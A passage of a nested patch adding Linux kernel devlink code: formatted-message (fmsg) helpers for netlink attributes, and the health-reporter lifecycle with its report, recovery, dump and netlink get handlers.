++	if (!item)
++		return -ENOMEM;
++
++	item->nla_type = NLA_NUL_STRING;
++	item->len = strlen(name) + 1;
++	item->attrtype = DEVLINK_ATTR_FMSG_OBJ_NAME;
++	memcpy(&item->value, name, item->len);
++	list_add_tail(&item->list, &fmsg->item_list);
++
++	return 0;
++}
++
++int devlink_fmsg_pair_nest_start(struct devlink_fmsg *fmsg, const char *name)
++{
++	int err;
++
++	if (fmsg->putting_binary)
++		return -EINVAL;
++
++	err = devlink_fmsg_nest_common(fmsg, DEVLINK_ATTR_FMSG_PAIR_NEST_START);
++	if (err)
++		return err;
++
++	err = devlink_fmsg_put_name(fmsg, name);
++	if (err)
++		return err;
++
++	return 0;
++}
++EXPORT_SYMBOL_GPL(devlink_fmsg_pair_nest_start);
++
++int devlink_fmsg_pair_nest_end(struct devlink_fmsg *fmsg)
++{
++	if (fmsg->putting_binary)
++		return -EINVAL;
++
++	return devlink_fmsg_nest_end(fmsg);
++}
++EXPORT_SYMBOL_GPL(devlink_fmsg_pair_nest_end);
++
++int devlink_fmsg_arr_pair_nest_start(struct devlink_fmsg *fmsg,
++				     const char *name)
++{
++	int err;
++
++	if (fmsg->putting_binary)
++		return -EINVAL;
++
++	err = devlink_fmsg_pair_nest_start(fmsg, name);
++	if (err)
++		return err;
++
++	err = devlink_fmsg_nest_common(fmsg, DEVLINK_ATTR_FMSG_ARR_NEST_START);
++	if (err)
++		return err;
++
++	return 0;
++}
++EXPORT_SYMBOL_GPL(devlink_fmsg_arr_pair_nest_start);
++
++int devlink_fmsg_arr_pair_nest_end(struct devlink_fmsg *fmsg)
++{
++	int err;
++
++	if (fmsg->putting_binary)
++		return -EINVAL;
++
++	err = devlink_fmsg_nest_end(fmsg);
++	if (err)
++		return err;
++
++	err = devlink_fmsg_nest_end(fmsg);
++	if (err)
++		return err;
++
++	return 0;
++}
++EXPORT_SYMBOL_GPL(devlink_fmsg_arr_pair_nest_end);
++
++int devlink_fmsg_binary_pair_nest_start(struct devlink_fmsg *fmsg,
++					const char *name)
++{
++	int err;
++
++	err = devlink_fmsg_arr_pair_nest_start(fmsg, name);
++	if (err)
++		return err;
++
++	fmsg->putting_binary = true;
++	return err;
++}
++EXPORT_SYMBOL_GPL(devlink_fmsg_binary_pair_nest_start);
++
++int devlink_fmsg_binary_pair_nest_end(struct devlink_fmsg *fmsg)
++{
++	if (!fmsg->putting_binary)
++		return -EINVAL;
++
++	fmsg->putting_binary = false;
++	return devlink_fmsg_arr_pair_nest_end(fmsg);
++}
++EXPORT_SYMBOL_GPL(devlink_fmsg_binary_pair_nest_end);
++
++static int devlink_fmsg_put_value(struct devlink_fmsg *fmsg,
++				  const void *value, u16 value_len,
++				  u8 value_nla_type)
++{
++	struct devlink_fmsg_item *item;
++
++	if (value_len > DEVLINK_FMSG_MAX_SIZE)
++		return -EMSGSIZE;
++
++	item = kzalloc(sizeof(*item) + value_len, GFP_KERNEL);
++	if (!item)
++		return -ENOMEM;
++
++	item->nla_type = value_nla_type;
++	item->len = value_len;
++	item->attrtype = DEVLINK_ATTR_FMSG_OBJ_VALUE_DATA;
++	memcpy(&item->value, value, item->len);
++	list_add_tail(&item->list, &fmsg->item_list);
++
++	return 0;
++}
++
++static int devlink_fmsg_bool_put(struct devlink_fmsg *fmsg, bool value)
++{
++	if (fmsg->putting_binary)
++		return -EINVAL;
++
++	return devlink_fmsg_put_value(fmsg, &value, sizeof(value), NLA_FLAG);
++}
++
++static int devlink_fmsg_u8_put(struct devlink_fmsg *fmsg, u8 value)
++{
++	if (fmsg->putting_binary)
++		return -EINVAL;
++
++	return devlink_fmsg_put_value(fmsg, &value, sizeof(value), NLA_U8);
++}
++
++int devlink_fmsg_u32_put(struct devlink_fmsg *fmsg, u32 value)
++{
++	if (fmsg->putting_binary)
++		return -EINVAL;
++
++	return devlink_fmsg_put_value(fmsg, &value, sizeof(value), NLA_U32);
++}
++EXPORT_SYMBOL_GPL(devlink_fmsg_u32_put);
++
++static int devlink_fmsg_u64_put(struct devlink_fmsg *fmsg, u64 value)
++{
++	if (fmsg->putting_binary)
++		return -EINVAL;
++
++	return devlink_fmsg_put_value(fmsg, &value, sizeof(value), NLA_U64);
++}
++
++int devlink_fmsg_string_put(struct devlink_fmsg *fmsg, const char *value)
++{
++	if (fmsg->putting_binary)
++		return -EINVAL;
++
++	return devlink_fmsg_put_value(fmsg, value, strlen(value) + 1,
++				      NLA_NUL_STRING);
++}
++EXPORT_SYMBOL_GPL(devlink_fmsg_string_put);
++
++int devlink_fmsg_binary_put(struct devlink_fmsg *fmsg, const void *value,
++			    u16 value_len)
++{
++	if (!fmsg->putting_binary)
++		return -EINVAL;
++
++	return devlink_fmsg_put_value(fmsg, value, value_len, NLA_BINARY);
++}
++EXPORT_SYMBOL_GPL(devlink_fmsg_binary_put);
++
++int devlink_fmsg_bool_pair_put(struct devlink_fmsg *fmsg, const char *name,
++			       bool value)
++{
++	int err;
++
++	err = devlink_fmsg_pair_nest_start(fmsg, name);
++	if (err)
++		return err;
++
++	err = devlink_fmsg_bool_put(fmsg, value);
++	if (err)
++		return err;
++
++	err = devlink_fmsg_pair_nest_end(fmsg);
++	if (err)
++		return err;
++
++	return 0;
++}
++EXPORT_SYMBOL_GPL(devlink_fmsg_bool_pair_put);
++
++int devlink_fmsg_u8_pair_put(struct devlink_fmsg *fmsg, const char *name,
++			     u8 value)
++{
++	int err;
++
++	err = devlink_fmsg_pair_nest_start(fmsg, name);
++	if (err)
++		return err;
++
++	err = devlink_fmsg_u8_put(fmsg, value);
++	if (err)
++		return err;
++
++	err = devlink_fmsg_pair_nest_end(fmsg);
++	if (err)
++		return err;
++
++	return 0;
++}
++EXPORT_SYMBOL_GPL(devlink_fmsg_u8_pair_put);
++
++int devlink_fmsg_u32_pair_put(struct devlink_fmsg *fmsg, const char *name,
++			      u32 value)
++{
++	int err;
++
++	err = devlink_fmsg_pair_nest_start(fmsg, name);
++	if (err)
++		return err;
++
++	err = devlink_fmsg_u32_put(fmsg, value);
++	if (err)
++		return err;
++
++	err = devlink_fmsg_pair_nest_end(fmsg);
++	if (err)
++		return err;
++
++	return 0;
++}
++EXPORT_SYMBOL_GPL(devlink_fmsg_u32_pair_put);
++
++int devlink_fmsg_u64_pair_put(struct devlink_fmsg *fmsg, const char *name,
++			      u64 value)
++{
++	int err;
++
++	err = devlink_fmsg_pair_nest_start(fmsg, name);
++	if (err)
++		return err;
++
++	err = devlink_fmsg_u64_put(fmsg, value);
++	if (err)
++		return err;
++
++	err = devlink_fmsg_pair_nest_end(fmsg);
++	if (err)
++		return err;
++
++	return 0;
++}
++EXPORT_SYMBOL_GPL(devlink_fmsg_u64_pair_put);
++
++int devlink_fmsg_string_pair_put(struct devlink_fmsg *fmsg, const char *name,
++				 const char *value)
++{
++	int err;
++
++	err = devlink_fmsg_pair_nest_start(fmsg, name);
++	if (err)
++		return err;
++
++	err = devlink_fmsg_string_put(fmsg, value);
++	if (err)
++		return err;
++
++	err = devlink_fmsg_pair_nest_end(fmsg);
++	if (err)
++		return err;
++
++	return 0;
++}
++EXPORT_SYMBOL_GPL(devlink_fmsg_string_pair_put);
++
++int devlink_fmsg_binary_pair_put(struct devlink_fmsg *fmsg, const char *name,
++				 const void *value, u32 value_len)
++{
++	u32 data_size;
++	int end_err;
++	u32 offset;
++	int err;
++
++	err = devlink_fmsg_binary_pair_nest_start(fmsg, name);
++	if (err)
++		return err;
++
++	for (offset = 0; offset < value_len; offset += data_size) {
++		data_size = value_len - offset;
++		if (data_size > DEVLINK_FMSG_MAX_SIZE)
++			data_size = DEVLINK_FMSG_MAX_SIZE;
++		err = devlink_fmsg_binary_put(fmsg, value + offset, data_size);
++		if (err)
++			break;
++		/* Exit from loop with a break (instead of
++		 * return) to make sure putting_binary is turned off in
++		 * devlink_fmsg_binary_pair_nest_end
++		 */
++	}
++
++	end_err = devlink_fmsg_binary_pair_nest_end(fmsg);
++	if (end_err)
++		err = end_err;
++
++	return err;
++}
++EXPORT_SYMBOL_GPL(devlink_fmsg_binary_pair_put);
++
++static int
++devlink_fmsg_item_fill_type(struct devlink_fmsg_item *msg, struct sk_buff *skb)
++{
++	switch (msg->nla_type) {
++	case NLA_FLAG:
++	case NLA_U8:
++	case NLA_U32:
++	case NLA_U64:
++	case NLA_NUL_STRING:
++	case NLA_BINARY:
++		return nla_put_u8(skb, DEVLINK_ATTR_FMSG_OBJ_VALUE_TYPE,
++				  msg->nla_type);
++	default:
++		return -EINVAL;
++	}
++}
++
++static int
++devlink_fmsg_item_fill_data(struct devlink_fmsg_item *msg, struct sk_buff *skb)
++{
++	int attrtype = DEVLINK_ATTR_FMSG_OBJ_VALUE_DATA;
++	u8 tmp;
++
++	switch (msg->nla_type) {
++	case NLA_FLAG:
++		/* Always provide flag data, regardless of its value */
++		tmp = *(bool *) msg->value;
++
++		return nla_put_u8(skb, attrtype, tmp);
++	case NLA_U8:
++		return nla_put_u8(skb, attrtype, *(u8 *) msg->value);
++	case NLA_U32:
++		return nla_put_u32(skb, attrtype, *(u32 *) msg->value);
++	case NLA_U64:
++		return nla_put_u64_64bit(skb, attrtype, *(u64 *) msg->value,
++					 DEVLINK_ATTR_PAD);
++	case NLA_NUL_STRING:
++		return nla_put_string(skb, attrtype, (char *) &msg->value);
++	case NLA_BINARY:
++		return nla_put(skb, attrtype, msg->len, (void *) &msg->value);
++	default:
++		return -EINVAL;
++	}
++}
++
++static int
++devlink_fmsg_prepare_skb(struct devlink_fmsg *fmsg, struct sk_buff *skb,
++			 int *start)
++{
++	struct devlink_fmsg_item *item;
++	struct nlattr *fmsg_nlattr;
++	int i = 0;
++	int err;
++
++	fmsg_nlattr = nla_nest_start_noflag(skb, DEVLINK_ATTR_FMSG);
++	if (!fmsg_nlattr)
++		return -EMSGSIZE;
++
++	list_for_each_entry(item, &fmsg->item_list, list) {
++		if (i < *start) {
++			i++;
++			continue;
++		}
++
++		switch (item->attrtype) {
++		case DEVLINK_ATTR_FMSG_OBJ_NEST_START:
++		case DEVLINK_ATTR_FMSG_PAIR_NEST_START:
++		case DEVLINK_ATTR_FMSG_ARR_NEST_START:
++		case DEVLINK_ATTR_FMSG_NEST_END:
++			err = nla_put_flag(skb, item->attrtype);
++			break;
++		case DEVLINK_ATTR_FMSG_OBJ_VALUE_DATA:
++			err = devlink_fmsg_item_fill_type(item, skb);
++			if (err)
++				break;
++			err = devlink_fmsg_item_fill_data(item, skb);
++			break;
++		case DEVLINK_ATTR_FMSG_OBJ_NAME:
++			err = nla_put_string(skb, item->attrtype,
++					     (char *) &item->value);
++			break;
++		default:
++			err = -EINVAL;
++			break;
++		}
++		if (!err)
++			*start = ++i;
++		else
++			break;
++	}
++
++	nla_nest_end(skb, fmsg_nlattr);
++	return err;
++}
++
++static int devlink_fmsg_snd(struct devlink_fmsg *fmsg,
++			    struct genl_info *info,
++			    enum devlink_command cmd, int flags)
++{
++	struct nlmsghdr *nlh;
++	struct sk_buff *skb;
++	bool last = false;
++	int index = 0;
++	void *hdr;
++	int err;
++
++	while (!last) {
++		int tmp_index = index;
++
++		skb = genlmsg_new(GENLMSG_DEFAULT_SIZE, GFP_KERNEL);
++		if (!skb)
++			return -ENOMEM;
++
++		hdr = genlmsg_put(skb, info->snd_portid, info->snd_seq,
++				  &devlink_nl_family, flags | NLM_F_MULTI, cmd);
++		if (!hdr) {
++			err = -EMSGSIZE;
++			goto nla_put_failure;
++		}
++
++		err = devlink_fmsg_prepare_skb(fmsg, skb, &index);
++		if (!err)
++			last = true;
++		else if (err != -EMSGSIZE || tmp_index == index)
++			goto nla_put_failure;
++
++		genlmsg_end(skb, hdr);
++		err = genlmsg_reply(skb, info);
++		if (err)
++			return err;
++	}
++
++	skb = genlmsg_new(GENLMSG_DEFAULT_SIZE, GFP_KERNEL);
++	if (!skb)
++		return -ENOMEM;
++	nlh = nlmsg_put(skb, info->snd_portid, info->snd_seq,
++			NLMSG_DONE, 0, flags | NLM_F_MULTI);
++	if (!nlh) {
++		err = -EMSGSIZE;
++		goto nla_put_failure;
++	}
++
++	return genlmsg_reply(skb, info);
++
++nla_put_failure:
++	nlmsg_free(skb);
++	return err;
++}
++
++static int devlink_fmsg_dumpit(struct devlink_fmsg *fmsg, struct sk_buff *skb,
++			       struct netlink_callback *cb,
++			       enum devlink_command cmd)
++{
++	int index = cb->args[0];
++	int tmp_index = index;
++	void *hdr;
++	int err;
++
++	hdr = genlmsg_put(skb, NETLINK_CB(cb->skb).portid, cb->nlh->nlmsg_seq,
++			  &devlink_nl_family, NLM_F_ACK | NLM_F_MULTI, cmd);
++	if (!hdr) {
++		err = -EMSGSIZE;
++		goto nla_put_failure;
++	}
++
++	err = devlink_fmsg_prepare_skb(fmsg, skb, &index);
++	if ((err && err != -EMSGSIZE) || tmp_index == index)
++		goto nla_put_failure;
++
++	cb->args[0] = index;
++	genlmsg_end(skb, hdr);
++	return skb->len;
++
++nla_put_failure:
++	genlmsg_cancel(skb, hdr);
++	return err;
++}
++
++struct devlink_health_reporter {
++	struct list_head list;
++	void *priv;
++	const struct devlink_health_reporter_ops *ops;
++	struct devlink *devlink;
++	struct devlink_port *devlink_port;
++	struct devlink_fmsg *dump_fmsg;
++	struct mutex dump_lock; /* lock parallel read/write from dump buffers */
++	u64 graceful_period;
++	bool auto_recover;
++	bool auto_dump;
++	u8 health_state;
++	u64 dump_ts;
++	u64 dump_real_ts;
++	u64 error_count;
++	u64 recovery_count;
++	u64 last_recovery_ts;
++	refcount_t refcount;
++};
++
++void *
++devlink_health_reporter_priv(struct devlink_health_reporter *reporter)
++{
++	return reporter->priv;
++}
++EXPORT_SYMBOL_GPL(devlink_health_reporter_priv);
++
++static struct devlink_health_reporter *
++__devlink_health_reporter_find_by_name(struct list_head *reporter_list,
++				       struct mutex *list_lock,
++				       const char *reporter_name)
++{
++	struct devlink_health_reporter *reporter;
++
++	lockdep_assert_held(list_lock);
++	list_for_each_entry(reporter, reporter_list, list)
++		if (!strcmp(reporter->ops->name, reporter_name))
++			return reporter;
++	return NULL;
++}
++
++static struct devlink_health_reporter *
++devlink_health_reporter_find_by_name(struct devlink *devlink,
++				     const char *reporter_name)
++{
++	return __devlink_health_reporter_find_by_name(&devlink->reporter_list,
++						      &devlink->reporters_lock,
++						      reporter_name);
++}
++
++static struct devlink_health_reporter *
++devlink_port_health_reporter_find_by_name(struct devlink_port *devlink_port,
++					  const char *reporter_name)
++{
++	return __devlink_health_reporter_find_by_name(&devlink_port->reporter_list,
++						      &devlink_port->reporters_lock,
++						      reporter_name);
++}
++
++static struct devlink_health_reporter *
++__devlink_health_reporter_create(struct devlink *devlink,
++				 const struct devlink_health_reporter_ops *ops,
++				 u64 graceful_period, void *priv)
++{
++	struct devlink_health_reporter *reporter;
++
++	if (WARN_ON(graceful_period && !ops->recover))
++		return ERR_PTR(-EINVAL);
++
++	reporter = kzalloc(sizeof(*reporter), GFP_KERNEL);
++	if (!reporter)
++		return ERR_PTR(-ENOMEM);
++
++	reporter->priv = priv;
++	reporter->ops = ops;
++	reporter->devlink = devlink;
++	reporter->graceful_period = graceful_period;
++	reporter->auto_recover = !!ops->recover;
++	reporter->auto_dump = !!ops->dump;
++	mutex_init(&reporter->dump_lock);
++	refcount_set(&reporter->refcount, 1);
++	return reporter;
++}
++
++/**
++ *	devlink_port_health_reporter_create - create devlink health reporter for
++ *	                                      specified port instance
++ *
++ *	@port: devlink_port which should contain the new reporter
++ *	@ops: ops
++ *	@graceful_period: to avoid recovery loops, in msecs
++ *	@priv: priv
++ */
++struct devlink_health_reporter *
++devlink_port_health_reporter_create(struct devlink_port *port,
++				    const struct devlink_health_reporter_ops *ops,
++				    u64 graceful_period, void *priv)
++{
++	struct devlink_health_reporter *reporter;
++
++	mutex_lock(&port->reporters_lock);
++	if (__devlink_health_reporter_find_by_name(&port->reporter_list,
++						   &port->reporters_lock, ops->name)) {
++		reporter = ERR_PTR(-EEXIST);
++		goto unlock;
++	}
++
++	reporter = __devlink_health_reporter_create(port->devlink, ops,
++						    graceful_period, priv);
++	if (IS_ERR(reporter))
++		goto unlock;
++
++	reporter->devlink_port = port;
++	list_add_tail(&reporter->list, &port->reporter_list);
++unlock:
++	mutex_unlock(&port->reporters_lock);
++	return reporter;
++}
++EXPORT_SYMBOL_GPL(devlink_port_health_reporter_create);
++
++/**
++ *	devlink_health_reporter_create - create devlink health reporter
++ *
++ *	@devlink: devlink
++ *	@ops: ops
++ *	@graceful_period: to avoid recovery loops, in msecs
++ *	@priv: priv
++ */
++struct devlink_health_reporter *
++devlink_health_reporter_create(struct devlink *devlink,
++			       const struct devlink_health_reporter_ops *ops,
++			       u64 graceful_period, void *priv)
++{
++	struct devlink_health_reporter *reporter;
++
++	mutex_lock(&devlink->reporters_lock);
++	if (devlink_health_reporter_find_by_name(devlink, ops->name)) {
++		reporter = ERR_PTR(-EEXIST);
++		goto unlock;
++	}
++
++	reporter = __devlink_health_reporter_create(devlink, ops,
++						    graceful_period, priv);
++	if (IS_ERR(reporter))
++		goto unlock;
++
++	list_add_tail(&reporter->list, &devlink->reporter_list);
++unlock:
++	mutex_unlock(&devlink->reporters_lock);
++	return reporter;
++}
++EXPORT_SYMBOL_GPL(devlink_health_reporter_create);
++
++static void
++devlink_health_reporter_free(struct devlink_health_reporter *reporter)
++{
++	mutex_destroy(&reporter->dump_lock);
++	if (reporter->dump_fmsg)
++		devlink_fmsg_free(reporter->dump_fmsg);
++	kfree(reporter);
++}
++
++static void
++devlink_health_reporter_put(struct devlink_health_reporter *reporter)
++{
++	if (refcount_dec_and_test(&reporter->refcount))
++		devlink_health_reporter_free(reporter);
++}
++
++static void
++__devlink_health_reporter_destroy(struct devlink_health_reporter *reporter)
++{
++	list_del(&reporter->list);
++	devlink_health_reporter_put(reporter);
++}
++
++/**
++ *	devlink_health_reporter_destroy - destroy devlink health reporter
++ *
++ *	@reporter: devlink health reporter to destroy
++ */
++void
++devlink_health_reporter_destroy(struct devlink_health_reporter *reporter)
++{
++	struct mutex *lock = &reporter->devlink->reporters_lock;
++
++	mutex_lock(lock);
++	__devlink_health_reporter_destroy(reporter);
++	mutex_unlock(lock);
++}
++EXPORT_SYMBOL_GPL(devlink_health_reporter_destroy);
++
++/**
++ *	devlink_port_health_reporter_destroy - destroy devlink port health reporter
++ *
++ *	@reporter: devlink health reporter to destroy
++ */
++void
++devlink_port_health_reporter_destroy(struct devlink_health_reporter *reporter)
++{
++	struct mutex *lock = &reporter->devlink_port->reporters_lock;
++
++	mutex_lock(lock);
++	__devlink_health_reporter_destroy(reporter);
++	mutex_unlock(lock);
++}
++EXPORT_SYMBOL_GPL(devlink_port_health_reporter_destroy);
++
++static int
++devlink_nl_health_reporter_fill(struct sk_buff *msg,
++				struct devlink_health_reporter *reporter,
++				enum devlink_command cmd, u32 portid,
++				u32 seq, int flags)
++{
++	struct devlink *devlink = reporter->devlink;
++	struct nlattr *reporter_attr;
++	void *hdr;
++
++	hdr = genlmsg_put(msg, portid, seq, &devlink_nl_family, flags, cmd);
++	if (!hdr)
++		return -EMSGSIZE;
++
++	if (devlink_nl_put_handle(msg, devlink))
++		goto genlmsg_cancel;
++
++	if (reporter->devlink_port) {
++		if (nla_put_u32(msg, DEVLINK_ATTR_PORT_INDEX, reporter->devlink_port->index))
++			goto genlmsg_cancel;
++	}
++	reporter_attr = nla_nest_start_noflag(msg,
++					      DEVLINK_ATTR_HEALTH_REPORTER);
++	if (!reporter_attr)
++		goto genlmsg_cancel;
++	if (nla_put_string(msg, DEVLINK_ATTR_HEALTH_REPORTER_NAME,
++			   reporter->ops->name))
++		goto reporter_nest_cancel;
++	if (nla_put_u8(msg, DEVLINK_ATTR_HEALTH_REPORTER_STATE,
++		       reporter->health_state))
++		goto reporter_nest_cancel;
++	if (nla_put_u64_64bit(msg, DEVLINK_ATTR_HEALTH_REPORTER_ERR_COUNT,
++			      reporter->error_count, DEVLINK_ATTR_PAD))
++		goto reporter_nest_cancel;
++	if (nla_put_u64_64bit(msg, DEVLINK_ATTR_HEALTH_REPORTER_RECOVER_COUNT,
++			      reporter->recovery_count, DEVLINK_ATTR_PAD))
++		goto reporter_nest_cancel;
++	if (reporter->ops->recover &&
++	    nla_put_u64_64bit(msg, DEVLINK_ATTR_HEALTH_REPORTER_GRACEFUL_PERIOD,
++			      reporter->graceful_period,
++			      DEVLINK_ATTR_PAD))
++		goto reporter_nest_cancel;
++	if (reporter->ops->recover &&
++	    nla_put_u8(msg, DEVLINK_ATTR_HEALTH_REPORTER_AUTO_RECOVER,
++		       reporter->auto_recover))
++		goto reporter_nest_cancel;
++	if (reporter->dump_fmsg &&
++	    nla_put_u64_64bit(msg, DEVLINK_ATTR_HEALTH_REPORTER_DUMP_TS,
++			      jiffies_to_msecs(reporter->dump_ts),
++			      DEVLINK_ATTR_PAD))
++		goto reporter_nest_cancel;
++	if (reporter->dump_fmsg &&
++	    nla_put_u64_64bit(msg, DEVLINK_ATTR_HEALTH_REPORTER_DUMP_TS_NS,
++			      reporter->dump_real_ts, DEVLINK_ATTR_PAD))
++		goto reporter_nest_cancel;
++	if (reporter->ops->dump &&
++	    nla_put_u8(msg, DEVLINK_ATTR_HEALTH_REPORTER_AUTO_DUMP,
++		       reporter->auto_dump))
++		goto reporter_nest_cancel;
++
++	nla_nest_end(msg, reporter_attr);
++	genlmsg_end(msg, hdr);
++	return 0;
++
++reporter_nest_cancel:
++	nla_nest_end(msg, reporter_attr);
++genlmsg_cancel:
++	genlmsg_cancel(msg, hdr);
++	return -EMSGSIZE;
++}
++
++static void devlink_recover_notify(struct devlink_health_reporter *reporter,
++				   enum devlink_command cmd)
++{
++	struct devlink *devlink = reporter->devlink;
++	struct sk_buff *msg;
++	int err;
++
++	WARN_ON(cmd != DEVLINK_CMD_HEALTH_REPORTER_RECOVER);
++	WARN_ON(!xa_get_mark(&devlinks, devlink->index, DEVLINK_REGISTERED));
++
++	msg = nlmsg_new(NLMSG_DEFAULT_SIZE, GFP_KERNEL);
++	if (!msg)
++		return;
++
++	err = devlink_nl_health_reporter_fill(msg, reporter, cmd, 0, 0, 0);
++	if (err) {
++		nlmsg_free(msg);
++		return;
++	}
++
++	genlmsg_multicast_netns(&devlink_nl_family, devlink_net(devlink), msg,
++				0, DEVLINK_MCGRP_CONFIG, GFP_KERNEL);
++}
++
++void
++devlink_health_reporter_recovery_done(struct devlink_health_reporter *reporter)
++{
++	reporter->recovery_count++;
++	reporter->last_recovery_ts = jiffies;
++}
++EXPORT_SYMBOL_GPL(devlink_health_reporter_recovery_done);
++
++static int
++devlink_health_reporter_recover(struct devlink_health_reporter *reporter,
++				void *priv_ctx, struct netlink_ext_ack *extack)
++{
++	int err;
++
++	if (reporter->health_state == DEVLINK_HEALTH_REPORTER_STATE_HEALTHY)
++		return 0;
++
++	if (!reporter->ops->recover)
++		return -EOPNOTSUPP;
++
++	err = reporter->ops->recover(reporter, priv_ctx, extack);
++	if (err)
++		return err;
++
++	devlink_health_reporter_recovery_done(reporter);
++	reporter->health_state = DEVLINK_HEALTH_REPORTER_STATE_HEALTHY;
++	devlink_recover_notify(reporter, DEVLINK_CMD_HEALTH_REPORTER_RECOVER);
++
++	return 0;
++}
++
++static void
++devlink_health_dump_clear(struct devlink_health_reporter *reporter)
++{
++	if (!reporter->dump_fmsg)
++		return;
++	devlink_fmsg_free(reporter->dump_fmsg);
++	reporter->dump_fmsg = NULL;
++}
++
++static int devlink_health_do_dump(struct devlink_health_reporter *reporter,
++				  void *priv_ctx,
++				  struct netlink_ext_ack *extack)
++{
++	int err;
++
++	if (!reporter->ops->dump)
++		return 0;
++
++	if (reporter->dump_fmsg)
++		return 0;
++
++	reporter->dump_fmsg = devlink_fmsg_alloc();
++	if (!reporter->dump_fmsg) {
++		err = -ENOMEM;
++		return err;
++	}
++
++	err = devlink_fmsg_obj_nest_start(reporter->dump_fmsg);
++	if (err)
++		goto dump_err;
++
++	err = reporter->ops->dump(reporter, reporter->dump_fmsg,
++				  priv_ctx, extack);
++	if (err)
++		goto dump_err;
++
++	err = devlink_fmsg_obj_nest_end(reporter->dump_fmsg);
++	if (err)
++		goto dump_err;
++
++	reporter->dump_ts = jiffies;
++	reporter->dump_real_ts = ktime_get_real_ns();
++
++	return 0;
++
++dump_err:
++	devlink_health_dump_clear(reporter);
++	return err;
++}
++
++int devlink_health_report(struct devlink_health_reporter *reporter,
++			  const char *msg, void *priv_ctx)
++{
++	enum devlink_health_reporter_state prev_health_state;
++	struct devlink *devlink = reporter->devlink;
++	unsigned long recover_ts_threshold;
++	int ret;
++
++	/* write a log message of the current error */
++	WARN_ON(!msg);
++	trace_devlink_health_report(devlink, reporter->ops->name, msg);
++	reporter->error_count++;
++	prev_health_state = reporter->health_state;
++	reporter->health_state = DEVLINK_HEALTH_REPORTER_STATE_ERROR;
++	devlink_recover_notify(reporter, DEVLINK_CMD_HEALTH_REPORTER_RECOVER);
++
++	/* abort if the previous error wasn't recovered */
++	recover_ts_threshold = reporter->last_recovery_ts +
++			       msecs_to_jiffies(reporter->graceful_period);
++	if (reporter->auto_recover &&
++	    (prev_health_state != DEVLINK_HEALTH_REPORTER_STATE_HEALTHY ||
++	     (reporter->last_recovery_ts && reporter->recovery_count &&
++	      time_is_after_jiffies(recover_ts_threshold)))) {
++		trace_devlink_health_recover_aborted(devlink,
++						     reporter->ops->name,
++						     reporter->health_state,
++						     jiffies -
++						     reporter->last_recovery_ts);
++		return -ECANCELED;
++	}
++
++	reporter->health_state = DEVLINK_HEALTH_REPORTER_STATE_ERROR;
++
++	if (reporter->auto_dump) {
++		mutex_lock(&reporter->dump_lock);
++		/* store current dump of current error, for later analysis */
++		devlink_health_do_dump(reporter, priv_ctx, NULL);
++		mutex_unlock(&reporter->dump_lock);
++	}
++
++	if (!reporter->auto_recover)
++		return 0;
++
++	devl_lock(devlink);
++	ret = devlink_health_reporter_recover(reporter, priv_ctx, NULL);
++	devl_unlock(devlink);
++
++	return ret;
++}
++EXPORT_SYMBOL_GPL(devlink_health_report);
++
++static struct devlink_health_reporter *
++devlink_health_reporter_get_from_attrs(struct devlink *devlink,
++				       struct nlattr **attrs)
++{
++	struct devlink_health_reporter *reporter;
++	struct devlink_port *devlink_port;
++	char *reporter_name;
++
++	if (!attrs[DEVLINK_ATTR_HEALTH_REPORTER_NAME])
++		return NULL;
++
++	reporter_name = nla_data(attrs[DEVLINK_ATTR_HEALTH_REPORTER_NAME]);
++	devlink_port = devlink_port_get_from_attrs(devlink, attrs);
++	if (IS_ERR(devlink_port)) {
++		mutex_lock(&devlink->reporters_lock);
++		reporter = devlink_health_reporter_find_by_name(devlink, reporter_name);
++		if (reporter)
++			refcount_inc(&reporter->refcount);
++		mutex_unlock(&devlink->reporters_lock);
++	} else {
++		mutex_lock(&devlink_port->reporters_lock);
++		reporter = devlink_port_health_reporter_find_by_name(devlink_port, reporter_name);
++		if (reporter)
++			refcount_inc(&reporter->refcount);
++		mutex_unlock(&devlink_port->reporters_lock);
++	}
++
++	return reporter;
++}
++
++static struct devlink_health_reporter *
++devlink_health_reporter_get_from_info(struct devlink *devlink,
++				      struct genl_info *info)
++{
++	return devlink_health_reporter_get_from_attrs(devlink, info->attrs);
++}
++
++static struct devlink_health_reporter *
++devlink_health_reporter_get_from_cb(struct netlink_callback *cb)
++{
++	const struct genl_dumpit_info *info = genl_dumpit_info(cb);
++	struct devlink_health_reporter *reporter;
++	struct nlattr **attrs = info->attrs;
++	struct devlink *devlink;
++
++	devlink = devlink_get_from_attrs(sock_net(cb->skb->sk), attrs);
++	if (IS_ERR(devlink))
++		return NULL;
++
++	reporter = devlink_health_reporter_get_from_attrs(devlink, attrs);
++	devlink_put(devlink);
++	return reporter;
++}
++
++void
++devlink_health_reporter_state_update(struct devlink_health_reporter *reporter,
++				     enum devlink_health_reporter_state state)
++{
++	if (WARN_ON(state != DEVLINK_HEALTH_REPORTER_STATE_HEALTHY &&
++		    state != DEVLINK_HEALTH_REPORTER_STATE_ERROR))
++		return;
++
++	if (reporter->health_state == state)
++		return;
++
++	reporter->health_state = state;
++	trace_devlink_health_reporter_state_update(reporter->devlink,
++						   reporter->ops->name, state);
++	devlink_recover_notify(reporter, DEVLINK_CMD_HEALTH_REPORTER_RECOVER);
++}
++EXPORT_SYMBOL_GPL(devlink_health_reporter_state_update);
++
++static int devlink_nl_cmd_health_reporter_get_doit(struct sk_buff *skb,
++						   struct genl_info *info)
++{
++	struct devlink *devlink = info->user_ptr[0];
++	struct devlink_health_reporter *reporter;
++	struct sk_buff *msg;
++	int err;
++
++	reporter = devlink_health_reporter_get_from_info(devlink, info);
++	if (!reporter)
++		return -EINVAL;
++
++	msg = nlmsg_new(NLMSG_DEFAULT_SIZE, GFP_KERNEL);
++	if (!msg) {
++		err = -ENOMEM;
++		goto out;
++	}
++
++	err = devlink_nl_health_reporter_fill(msg, reporter,
++					      DEVLINK_CMD_HEALTH_REPORTER_GET,
++					      info->snd_portid, info->snd_seq,
++					      0);
++	if (err) {
++		nlmsg_free(msg);
++		goto out;
++	}
++
++	err = genlmsg_reply(msg, info);
++out:
++	devlink_health_reporter_put(reporter);
++	return err;
++}
++
++static int
++devlink_nl_cmd_health_reporter_get_dumpit(struct sk_buff *msg,
++					  struct netlink_callback *cb)
++{
++	struct devlink_health_reporter *reporter;
++	struct devlink_port *port;
++	struct devlink *devlink;
++	int start = cb->args[0];
++	unsigned long index;
++	int idx = 0;
++	int err;
++
++	devlinks_xa_for_each_registered_get(sock_net(msg->sk), index, devlink) {
++		mutex_lock(&devlink->reporters_lock);
++		list_for_each_entry(reporter, &devlink->reporter_list,
++				    list) {
++			if (idx < start) {
++				idx++;
++				continue;
++			}
++			err = devlink_nl_health_reporter_fill(
